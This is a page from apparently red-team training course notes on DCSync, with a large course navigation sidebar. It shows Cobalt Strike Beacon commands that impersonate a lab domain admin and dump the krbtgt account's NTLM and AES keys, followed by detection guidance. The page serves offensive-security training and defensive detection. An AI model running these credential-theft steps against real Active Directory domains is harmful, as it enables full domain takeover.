RTO
  • Getting Started
    • What is Red Teaming?
    • What is OPSEC?
    • Primum non nocere?
    • Attack Lifecycle
    • Engagement Planning
    • Post-Engagement & Reporting
  • Command & Control
    • Red Team Ops Lab
    • Cobalt Strike
    • Starting the Team Server
    • Listener Management
    • Generating Payloads
    • Interacting with Beacon
    • Pivot Listeners
    • Running as a Service
  • External Reconnaissance
    • External Reconnaissance
    • DNS Records
    • Google Dorks
    • Social Media
  • Initial Compromise
    • Initial Compromise
    • Password Spraying
    • Internal Phishing
    • Initial Access Payloads
    • Visual Basic for Applications (VBA) Macros
    • Remote Template Injection
    • HTML Smuggling
  • Host Reconnaissance
    • Host Reconnaissance
    • Processes
    • Seatbelt
    • Screenshots
    • Keylogger
    • Clipboard
    • User Sessions
  • Host Persistence
    • Host Persistence
    • Task Scheduler
    • Startup Folder
    • Registry AutoRun
    • Hunting for COM Hijacks
    • Headless Cobalt Strike
  • Host Privilege Escalation
    • Host Privilege Escalation
    • Windows Services
    • Unquoted Service Paths
    • Weak Service Permissions
    • Weak Service Binary Permissions
    • UAC Bypasses
  • Elevated Host Persistence
    • Elevated Host Persistence
    • Windows Services
    • WMI Event Subscriptions
  • Credential Theft
    • Obtaining Credential Material
    • Beacon + Mimikatz
    • NTLM Hashes
    • Kerberos Encryption Keys
    • Security Account Manager
    • Domain Cached Credentials
    • Extracting Kerberos Tickets
    • DCSync
  • Password Cracking Tips & Tricks
    • Password Cracking Tips & Tricks
    • Wordlists
    • Wordlist + Rules
    • Masks
    • Mask Length & Mask Files
    • Combinator
    • Hybrid
    • kwprocessor
  • Domain Reconnaissance
    • Domain Recon
    • PowerView
    • SharpView
    • ADSearch
  • User Impersonation
    • User Impersonation
    • Pass the Hash
    • Pass the Ticket
    • Overpass the Hash
    • Token Impersonation
    • Make Token
    • Process Injection
  • Lateral Movement
    • Lateral Movement
    • Windows Remote Management
    • PsExec
    • Windows Management Instrumentation (WMI)
    • The Curious Case of CoInitializeSecurity
    • DCOM
  • Session Passing
    • Session Passing
    • Beacon Passing
    • Foreign Listener
    • Spawn & Inject
  • Pivoting
    • SOCKS Proxies
    • Linux Tools
    • Windows Tools
    • Browsers
    • Reverse Port Forwards
    • NTLM Relaying
  • Data Protection API
    • Data Protection API
    • Credential Manager
    • Scheduled Task Credentials
  • Kerberos
    • Kerberos
    • Kerberoasting
    • ASREP Roasting
    • Unconstrained Delegation
    • Constrained Delegation
    • Alternate Service Name
    • S4U2Self Abuse
    • Resource-Based Constrained Delegation
    • Shadow Credentials
  • Active Directory Certificate Services
    • Active Directory Certificate Services
    • Finding Certificate Authorities
    • Misconfigured Certificate Templates
    • NTLM Relaying to ADCS HTTP Endpoints
    • User & Computer Persistence
  • Group Policy
    • Abusing Group Policy
    • Modify Existing GPO
    • Create & Link a GPO
  • MS SQL Servers
    • MS SQL Servers
    • MS SQL Impersonation
    • MS SQL Command Execution
    • MS SQL Lateral Movement
    • MS SQL Privilege Escalation
  • Domain Dominance
    • Domain Dominance
    • Silver Tickets
    • Golden Tickets
    • Diamond Tickets
    • Forged Certificates
  • Forest & Domain Trusts
    • Forest & Domain Trusts
    • Parent/Child
    • One-Way Inbound
    • One-Way Outbound
  • Local Administrator Password Solution
    • Local Administrator Password Solution
    • Reading ms-Mcs-AdmPwd
    • Password Expiration Protection
    • LAPS Backdoors
  • Microsoft Defender Antivirus
    • Microsoft Defender Antivirus
    • On-Disk Detections
    • Artifact Kit
    • In-Memory Detections
    • Resource Kit
    • AMSI vs Post-Exploitation
    • Behavioural Detections
  • Application Whitelisting
    • AppLocker
    • Policy Enumeration
    • Writeable Paths
    • Living Off The Land Binaries, Scripts and Libraries
    • PowerShell CLM
    • Beacon DLL
  • Data Hunting & Exfiltration
    • Data Hunting & Exfiltration
    • File Shares
    • Databases
  • Extending Cobalt Strike
    • Extending Cobalt Strike
    • Mimikatz Kit
    • Jump & Remote-Exec
    • Beacon Object Files
    • Malleable Command & Control
Powered by GitBook
On this page
  1. Credential Theft

DCSync

PreviousExtracting Kerberos TicketsNextPassword Cracking Tips & Tricks

Last updated 2 years ago

The is used to synchronise and replicate Active Directory data between domain controllers. DCSync is a technique which leverages this protocol to extract username and credential data from a DC.

This requires which is usually only available to domain admins. The technique is included here for completeness, and it will be useful later on.

\

Beacon has a dedicated dcsync command, which calls mimikatz lsadump::dcsync in the background.

beacon> make_token DEV\nlamb F3rrari

beacon> dcsync dev.cyberbotic.io DEV\krbtgt
[DC] 'dev.cyberbotic.io' will be the domain
[DC] 'dc-2.dev.cyberbotic.io' will be the DC server
[DC] 'DEV\krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

Credentials:
  Hash NTLM: 9fb924c244ad44e934c390dc17e02c3d
    ntlm- 0: 9fb924c244ad44e934c390dc17e02c3d
    lm  - 0: 207d5e08551c51892309c0cf652c353b
		
* Primary:Kerberos-Newer-Keys *
    Default Salt : DEV.CYBERBOTIC.IOkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e
      aes128_hmac       (4096) : 6fb62ed56c7de778ca5e4fe6da6d3aca
      des_cbc_md5       (4096) : 629189372a372fda

\

Here we have extracted the NTLM and AES keys for the krbtgt account using lamb (a domain admin).

\

OPSEC Directory replication can be detected if Directory Service Access auditing is enabled, by searching for 4662 events where the identifying GUID is 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (for DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) or 89e95b76-444d-4c62-991a-0facbeda640c (DS-Replication-Get-Changes-In-Filtered-Set). Find these using the "Suspicious Directory Replication" saved search in Kibana.

\

\

Replication traffic usually only occurs between domain controllers but can also be seen via applications such as . Mature organisations should baseline typical DRS traffic to find suspicious outliers.

Directory Replication Service (MS-DRSR) protocol
GetNCChanges
Azure AD Connect